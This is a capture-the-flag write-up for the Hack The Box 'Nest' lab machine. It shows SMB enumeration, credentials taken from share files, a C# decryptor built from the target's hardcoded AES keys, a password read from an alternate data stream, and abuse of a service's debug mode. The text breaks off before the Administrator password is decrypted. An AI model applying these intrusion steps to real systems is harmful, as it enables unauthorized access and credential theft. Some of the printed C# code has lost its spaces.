Previous Page
Nest Writeup
Introduction :
Nest is an easy windows box released back in january 2020.
Nest is an easy windows box released back in january 2020.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
→ sudo nmap -vvv -p- 10.10.10.178 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
[sudo] password for nothing:
Discovered open port 445/tcp on 10.10.10.178
Discovered open port 4386/tcp on 10.10.10.178
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
→ nmap -sCV -p445,4386 10.10.10.178 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 08:30 CEST
Nmap scan report for 10.10.10.178
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.91%I=7%D=5/28%Time=60B08DFE%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");
Host script results:
|_clock-skew: 7m38s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-28T06:40:33
|_ start_date: 2021-05-28T06:32:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.72 seconds
Our nmap scan picked up port 445 so let's investigate it:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
→ smbclient -L \\\\10.10.10.178
Enter WORKGROUP\nothing's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
→ smbmap -H 10.10.10.178 -u anonymous -r --depth 5
[+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
.\Data\*
dr--r--r-- 0 Thu Aug 8 00:53:46 2019 .
dr--r--r-- 0 Thu Aug 8 00:53:46 2019 ..
dr--r--r-- 0 Thu Aug 8 00:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 23:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 23:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 21:07:51 2019 Shared
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
.\Users\*
dr--r--r-- 0 Sun Jan 26 00:04:21 2020 .
dr--r--r-- 0 Sun Jan 26 00:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 17:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 08:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 19:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 19:02:56 2019 R.Thompson
dr--r--r-- 0 Thu Aug 8 00:56:02 2019 TempUser
Here it looks like the Data sgare seems to be accessible anonymously. So we can recursively list the contents of that share using smbclient:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
→ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\nothing's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
. D 0 Wed Aug 7 21:07:51 2019
.. D 0 Wed Aug 7 21:07:51 2019
Maintenance D 0 Wed Aug 7 21:07:32 2019
Templates D 0 Wed Aug 7 21:08:07 2019
\Shared\Maintenance
. D 0 Wed Aug 7 21:07:32 2019
.. D 0 Wed Aug 7 21:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019
\Shared\Templates
. D 0 Wed Aug 7 21:08:07 2019
.. D 0 Wed Aug 7 21:08:07 2019
HR D 0 Wed Aug 7 21:08:01 2019
Marketing D 0 Wed Aug 7 21:08:06 2019
\Shared\Templates\HR
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
\Shared\Templates\Marketing
. D 0 Wed Aug 7 21:08:06 2019
.. D 0 Wed Aug 7 21:08:06 2019
smb: \> cd \Shared\Templates\HR
smb: \Shared\Templates\HR\> ls
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
10485247 blocks of size 4096. 6543390 blocks available
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff,
You will find your home folder in the following location:
\\HTB-NEST\Users\
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
Here we get credentials: TempUser:welcome2019 So let's run smbmap once again to enumerate the shares:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ smbmap -u Tempuser -p welcome2019 -H 10.10.10.178
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ READ ONLY
Users READ ONLY
Now as we explore the shares with the tempuser we can access xml files for example:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Data' -A xml
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
[+] Starting search for files matching 'xml' on share Data.
[+] Match found! Downloading: Data\IT\Configs\Adobe\editing.xml
[+] Match found! Downloading: Data\IT\Configs\Adobe\projects.xml
[+] Match found! Downloading: Data\IT\Configs\Adobe\settings.xml
[+] Match found! Downloading: Data\IT\Configs\Atlas\Temp.XML
[+] Match found! Downloading: Data\IT\Configs\Microsoft\Options.xml
[+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\config.xml
[+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\shortcuts.xml
[+] Match found! Downloading: Data\IT\Configs\RU Scanner\RU_config.xml
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ ls -lash
total 52K
4.0K drwxr-xr-x 2 nothing nothing 4.0K May 28 09:29 .
4.0K drwxr-xr-x 7 nothing nothing 4.0K May 28 09:02 ..
4.0K -rw-r--r-- 1 nothing nothing 246 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_editing.xml
4.0K -rw-r--r-- 1 nothing nothing 258 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_projects.xml
4.0K -rw-r--r-- 1 nothing nothing 1.3K May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
4.0K -rw-r--r-- 1 nothing nothing 1.4K May 28 09:29 10.10.10.178-Data_IT_Configs_Atlas_Temp.XML
8.0K -rw-r--r-- 1 nothing nothing 4.5K May 28 09:29 10.10.10.178-Data_IT_Configs_Microsoft_Options.xml
8.0K -rw-r--r-- 1 nothing nothing 6.3K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml
4.0K -rw-r--r-- 1 nothing nothing 2.1K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_shortcuts.xml
4.0K -rw-r--r-- 1 nothing nothing 270 May 28 09:29 '10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml'
4.0K -rw-r--r-- 1 nothing nothing 425 May 28 09:02 'Welcome Email.txt'
Let's check if there is any sensitive information in the xml files we collected:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ vim 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ grep -i password *.xml
10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>%
So here it looks like that the password for the user c.smith is encrypted. Now what we should look for is the Secure share in the xml files, and we stumble upon the NotePadPlusPlus config file:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ grep -i 'Secure\$' *.xml
10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml: <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
Now we're hinted towards a Temp.txt file, so let's get it:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Secure$\IT\Carl'
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
Secure$ READ ONLY
.\Secure$IT\Carl\*
dr--r--r-- 0 Wed Aug 7 21:42:14 2019 .
dr--r--r-- 0 Wed Aug 7 21:42:14 2019 ..
dr--r--r-- 0 Wed Aug 7 21:44:00 2019 Docs
dr--r--r-- 0 Tue Aug 6 15:45:47 2019 Reports
dr--r--r-- 0 Tue Aug 6 16:41:55 2019 VB Projects
.\Secure$IT\Carl\Docs\*
dr--r--r-- 0 Wed Aug 7 21:44:00 2019 .
dr--r--r-- 0 Wed Aug 7 21:44:00 2019 ..
fr--r--r-- 56 Wed Aug 7 21:44:16 2019 ip.txt
fr--r--r-- 73 Wed Aug 7 21:43:46 2019 mmc.txt
.\Secure$IT\Carl\VB Projects\*
dr--r--r-- 0 Tue Aug 6 16:41:55 2019 .
dr--r--r-- 0 Tue Aug 6 16:41:55 2019 ..
dr--r--r-- 0 Tue Aug 6 16:41:53 2019 Production
dr--r--r-- 0 Tue Aug 6 16:47:41 2019 WIP
.\Secure$IT\Carl\VB Projects\WIP\*
dr--r--r-- 0 Tue Aug 6 16:47:41 2019 .
dr--r--r-- 0 Tue Aug 6 16:47:41 2019 ..
dr--r--r-- 0 Fri Aug 9 17:36:45 2019 RU
.\Secure$IT\Carl\VB Projects\WIP\RU\*
dr--r--r-- 0 Fri Aug 9 17:36:45 2019 .
dr--r--r-- 0 Fri Aug 9 17:36:45 2019 ..
dr--r--r-- 0 Thu Aug 8 00:05:54 2019 RUScanner
fr--r--r-- 871 Fri Aug 9 17:36:35 2019 RUScanner.sln
.\Secure$IT\Carl\VB Projects\WIP\RU\RUScanner\*
dr--r--r-- 0 Thu Aug 8 00:05:54 2019 .
dr--r--r-- 0 Thu Aug 8 00:05:54 2019 ..
dr--r--r-- 0 Wed Aug 7 22:00:11 2019 bin
fr--r--r-- 772 Thu Aug 8 00:05:09 2019 ConfigFile.vb
fr--r--r-- 279 Thu Aug 8 00:05:44 2019 Module1.vb
dr--r--r-- 0 Wed Aug 7 22:00:11 2019 My Project
dr--r--r-- 0 Wed Aug 7 22:00:11 2019 obj
fr--r--r-- 4828 Fri Aug 9 17:38:30 2019 RU Scanner.vbproj
fr--r--r-- 143 Wed Aug 7 22:00:28 2019 RU Scanner.vbproj.user
fr--r--r-- 133 Thu Aug 8 00:05:58 2019 SsoIntegration.vb
fr--r--r-- 4888 Thu Aug 8 00:06:03 2019 Utils.vb
And we were able to list the contents, the folder contains a Visual Basic project called RUScanner. so let's mount the share locally to examine the files:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ sudo mkdir /mnt/Data
[sudo] password for nothing:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ sudo mount -t cifs -o ro,username=TempUser,password=welcome2019 '//10.10.10.178/Secure$' /mnt/Data/
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ ls /mnt/Data
Finance HR IT
┌──(root💀nowhere)-[/mnt/Data/IT]
└─# cd /mnt/Data/IT/Carl/VB\ Projects/WIP/RU/RUScanner 130 ⨯
┌──(root💀nowhere)-[/mnt/…/VB Projects/WIP/RU/RUScanner]
└─# ls -lash
total 33K
4.0K drwxr-xr-x 2 root root 4.0K Aug 8 2019 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 9 2019 ..
0 drwxr-xr-x 2 root root 0 Aug 7 2019 bin
4.0K -rwxr-xr-x 1 root root 772 Aug 8 2019 ConfigFile.vb
512 -rwxr-xr-x 1 root root 279 Aug 8 2019 Module1.vb
0 drwxr-xr-x 2 root root 0 Aug 7 2019 'My Project'
0 drwxr-xr-x 2 root root 0 Aug 7 2019 obj
8.0K -rwxr-xr-x 1 root root 4.8K Aug 9 2019 'RU Scanner.vbproj'
512 -rwxr-xr-x 1 root root 143 Aug 6 2019 'RU Scanner.vbproj.user'
4.0K -rwxr-xr-x 1 root root 133 Aug 8 2019 SsoIntegration.vb
8.0K -rwxr-xr-x 1 root root 4.8K Aug 7 2019 Utils.vb
And here the important file is Utils.vb:
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils
Public Shared Function GetLogFilePath() As String
Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
End Function
Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
Public Shared Function EncryptString(PlainString As String) As String
If String.IsNullOrEmpty(PlainString) Then
Return String.Empty
Else
Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
Public Shared Function Encrypt(ByVal plainText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String
Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Basically here, we see that the class contains methods to encrypt and decrypt passwords. We can use the decryptString() function to decrypt the password gained earlier. As the code uses .NET classes, it can be rewritten in any .NET based language, therefore it can be ported to C#, and compiled on linux thanks to mono, so let's install it:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ apt search mono-devel
Sorting... Done
Full Text Search... Done
mono-devel/kali-rolling 6.8.0.105+dfsg-3 all
Mono development tools
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ apt install mono-devel
Now that we know the sourcecode, let's write the decrypt() function in C#, to which we will pass the encrypted password we found earlier:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ vim decrypt.cs
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;
namespace Dec {
class Decryptor{
public static void Main(){
var pt = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22","88552299", 2, "464R5DFA5DL6LE28", 256);
Console.WriteLine("PlainText: " + pt);
}
public static String Decrypt(String cipherText, String passPhrase, String saltValue, int passwordIterations, String initVector, int keySize ) {
var initVectorBytes=Encoding.ASCII.GetBytes(initVector);
var saltValueBytes=Encoding.ASCII.GetBytes(saltValue);
var cipherTextBytes=Convert.FromBase64String(cipherText);
var password=newRfc2898DeriveBytes(passPhrase, saltValueBytes,passwordIterations);
var keyBytes=password.GetBytes(keySize/8);
var symmetricKey=newAesCryptoServiceProvider();
symmetricKey.Mode=CipherMode.CBC;
var decryptor=symmetricKey.CreateDecryptor(keyBytes, initVectorBytes);
var memoryStream=newMemoryStream(cipherTextBytes);
var cryptoStream=newCryptoStream(memoryStream, decryptor,CryptoStreamMode.Read);
var plainTextBytes=newbyte[cipherTextBytes.Length];
var decryptedByteCount=cryptoStream.Read(plainTextBytes, 0,plainTextBytes.Length);
memoryStream.Close();
cryptoStream.Close();
varplainText=Encoding.ASCII.GetString(plainTextBytes, 0,decryptedByteCount);
returnplainText;
}
}
}
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ mcs decrypt.cs
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ ./decrypt.exe
Plaintext: xRxRxPANCAK3SxRxRx
And we decrypted c.smith's password ! xRxRxPANCAK3SxRxRx
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ sudo umount /mnt/Data
[sudo] password for nothing:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ smbclient -U c.smith //10.10.10.178/Users
Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
Try "help" to get a list of possible commands.
smb: \> cd c.smith
smb: \c.smith\> ls
. D 0 Sun Jan 26 08:21:44 2020
.. D 0 Sun Jan 26 08:21:44 2020
HQK Reporting D 0 Fri Aug 9 01:06:17 2019
user.txt A 32 Fri Aug 9 01:05:24 2019
smb: \c.smith\> get user.txt
getting file \c.smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \c.smith\>
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ cat user.txt
cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to get the user flag!
Now in order to privesc, we need to take a look at the HQK Reporting folder:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ smbclient -U c.smith //10.10.10.178/Users
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 17:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 19:03:01 2019
R.Thompson D 0 Thu Aug 8 19:02:50 2019
TempUser D 0 Thu Aug 8 00:55:56 2019
10485247 blocks of size 4096. 6543251 blocks available
smb: \> cd c.smith
smb: \c.smith\> ls
. D 0 Sun Jan 26 08:21:44 2020
.. D 0 Sun Jan 26 08:21:44 2020
HQK Reporting D 0 Fri Aug 9 01:06:17 2019
user.txt A 32 Fri Aug 9 01:05:24 2019
10485247 blocks of size 4096. 6543251 blocks available
smb: \c.smith\> cd "HQK Reporting"
smb: \c.smith\HQK Reporting\> ls
. D 0 Fri Aug 9 01:06:17 2019
.. D 0 Fri Aug 9 01:06:17 2019
AD Integration Module D 0 Fri Aug 9 14:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
10485247 blocks of size 4096. 6543251 blocks available
smb: \c.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Fri Aug 9 01:06:12 AM 2019 CEST
access_time: Fri Aug 9 01:06:12 AM 2019 CEST
write_time: Fri Aug 9 01:08:17 AM 2019 CEST
change_time: Fri Aug 9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \c.smith\HQK Reporting\>
Now here we see something interesting, we get hinted at a file called Debug Mode Password.txt, and it has file attributes, or Alternate Data Streams (ADS) attached to it. So let's get the file itself:
smb: \c.smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
getting file \c.smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \c.smith\HQK Reporting\> exit
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ ls -lash Debug\ Mode\ Password.txt:Password
4.0K -rw-r--r-- 1 nothing nothing 15 May 28 13:05 'Debug Mode Password.txt:Password'
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w
We're going to save it because we may need it later on. Let's download the xml file and binary from teh HQK folder:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
→ smbclient -U c.smith //10.10.10.178/Users
Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
Try "help" to get a list of possible commands.
smb: \> cd c.smith
smb: \c.smith\> cd "HQK Reporting"
smb: \c.smith\HQK Reporting\> ls
. D 0 Fri Aug 9 01:06:17 2019
.. D 0 Fri Aug 9 01:06:17 2019
AD Integration Module D 0 Fri Aug 9 14:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
10485247 blocks of size 4096. 6543251 blocks available
smb: \c.smith\HQK Reporting\> get HQK_Config_Backup.xml
getting file \c.smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \c.smith\HQK Reporting\> cd "AD Integration Module"
smb: \c.smith\HQK Reporting\AD Integration Module\> ls
. D 0 Fri Aug 9 14:18:42 2019
.. D 0 Fri Aug 9 14:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019
10485247 blocks of size 4096. 6543251 blocks available
smb: \c.smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe
getting file \c.smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (98.8 KiloBytes/sec) (average 56.5 KiloBytes/sec)
So here's what the xml file has:
[ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
→ cat HQK_Config_Backup.xml
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>4386</Port>
<QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>%
So here we get the configuration file for the service running on port 4386, let's try to connect to it using telnet:
[ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
→ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES
>1
Unrecognised command
>RUNQUERY 1
Invalid database configuration found. Please contact your system administrator
Invalid database configuration found. Please contact your system administrator
>SETDIR C:\
Current directory set to C:
>DEBUG
Invalid number of arguments specified
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
And here you see that we needed the password from earlier to properly use the DEBUG command, now from here we get a few additional commands:
>HELP
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
We get access to the commands named SERVICE, SESSION, SHOWQUERY
>SERVICE
--- HQK REPORTING SERVER INFO ---
Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
Here we get hinted towards the C:\Program Files\HQK\ directory:
>SETDIR C:\Program Files\HQK
Current directory set to HQK
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
Let's take a look at the LDAP directory:
>SETDIR LDAP
Current directory set to LDAP
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
And here we get credentials! Although this is still an encrypted password for the Administrator User, Just like before we need the following arguements to decrypt it: passphrase / saltvalue / passwordIterations / initVector / keySize And to find those, we need to decompile the HqkLdap.exe binary and we can do it using ILSpy.
